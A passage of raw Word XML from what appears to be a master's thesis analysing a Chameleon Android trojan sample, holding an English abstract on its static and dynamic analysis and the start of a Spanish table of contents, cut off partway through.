      </w:r>
    </w:p>
    <w:p w14:paraId="5E50FAE6" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRPr="002F2591" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
        <w:rPr>
          <w:lang w:val="en-US" w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63B62AE2" w14:textId="6F1BD175" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US" w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In this Master Thesis </w:t>
      </w:r>
      <w:r w:rsidR="005E10C0">
        <w:rPr>
          <w:lang w:val="en-US" w:bidi="en-US"/>
        </w:rPr>
        <w:t>Project,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005E10C0">
        <w:rPr>
          <w:lang w:val="en-US" w:bidi="en-US"/>
        </w:rPr>
        <w:t>a detailed analysis of a malware sample has been carried out. It revolves around a malware of trojan type that belongs to the family known as Chameleon, and it has been developed for targeting and infecting Android devices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D31C38B" w14:textId="6203684A" w:rsidR="005E10C0" w:rsidRDefault="005E10C0" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Static analysis has been applied over the code of the sample, with a previous phase of deobfuscation to make the code more legible and easier to understand. In this static phase the code has been analyzed in detail to try and understand the tasks the malware could use during its execution on an infected device, as well as the methods it employs to try and achieve success in its objectives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1633863A" w14:textId="65F0A605" w:rsidR="005E10C0" w:rsidRDefault="00CF40A0" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In parallel, a dynamic analysis phase has been carried out, executing the sample in a controlled environment with emulated devices and compiling all the information derived from the workings and behavior the malware exhibits when running, comparing the information extracted with the one obtained during the static analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063DDC50" w14:textId="7E47740E" w:rsidR="00CF40A0" w:rsidRPr="003914B9" w:rsidRDefault="00CF40A0" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Finally, all the information collected during the processes mentioned has been documented to try and showcase the detailed workings of the malware, the dangers it poses to users and how it fits within the current Android malware and trojan ecosystem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E981E6E" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914B9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD4453F" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="467128D9" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRPr="005E10C0" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E10C0">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Índice de contenidos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E38F80D" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRPr="005E10C0" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A910826" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRPr="005E10C0" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="464C71D1" w14:textId="6F229A14" w:rsidR="00DB0E28" w:rsidRDefault="00E95A92">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Enlacedelndice"/>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:webHidden/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="hi-IN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \z \o "1-3" \u \h</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Enlacedelndice"/>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="hi-IN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc170500142" w:history="1">
        <w:r w:rsidR="00DB0E28" w:rsidRPr="00C15843">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
            <w:noProof/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Índice de figuras</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170500142 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7DB73D8F" w14:textId="27542861" w:rsidR="00DB0E28" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170500143" w:history="1">
        <w:r w:rsidR="00DB0E28" w:rsidRPr="00C15843">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
            <w:noProof/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Índice de tablas</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170500143 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="79C18098" w14:textId="6AEB7833" w:rsidR="00DB0E28" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170500144" w:history="1">
        <w:r w:rsidR="00DB0E28" w:rsidRPr="00C15843">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
            <w:noProof/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Glosario de términos</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170500144 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0F6F4BC5" w14:textId="17478624" w:rsidR="00DB0E28" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170500145" w:history="1">
        <w:r w:rsidR="00DB0E28" w:rsidRPr="00C15843">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
            <w:noProof/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Introducción</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170500145 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3BBA847B" w14:textId="75A57495" w:rsidR="00DB0E28" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170500146" w:history="1">
        <w:r w:rsidR="00DB0E28" w:rsidRPr="00C15843">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
            <w:noProof/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Capítulo 1: Estudio del problema</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170500146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7D793A32" w14:textId="65B888A7" w:rsidR="00DB0E28" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170500147" w:history="1">
        <w:r w:rsidR="00DB0E28" w:rsidRPr="00C15843">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
            <w:noProof/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>1.1   EL CONTEXTO DEL PROBLEMA</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170500147 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2EBA965D" w14:textId="5B44A822" w:rsidR="00DB0E28" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170500148" w:history="1">
        <w:r w:rsidR="00DB0E28" w:rsidRPr="00C15843">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
            <w:noProof/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>1.2   EL ESTADO DEL ARTE</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170500148 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>14</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="47272D8D" w14:textId="61C10D50" w:rsidR="00DB0E28" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170500149" w:history="1">
        <w:r w:rsidR="00DB0E28" w:rsidRPr="00C15843">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
            <w:noProof/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>1.2.5   Conclusión</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170500149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450B43CD" w14:textId="089ADD7E" w:rsidR="00DB0E28" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170500150" w:history="1">
        <w:r w:rsidR="00DB0E28" w:rsidRPr="00C15843">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
            <w:noProof/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>1.3   DEFINICIÓN DEL PROBLEMA</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170500150 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5C34F78C" w14:textId="71A78E40" w:rsidR="00DB0E28" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170500151" w:history="1">
        <w:r w:rsidR="00DB0E28" w:rsidRPr="00C15843">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
            <w:noProof/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>1.4   MALWARE ELEGIDO</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170500151 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="77099B29" w14:textId="4EB74188" w:rsidR="00DB0E28" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170500152" w:history="1">
        <w:r w:rsidR="00DB0E28" w:rsidRPr="00C15843">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
            <w:noProof/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>1.4.2   Tecnologías utilizadas</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170500152 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
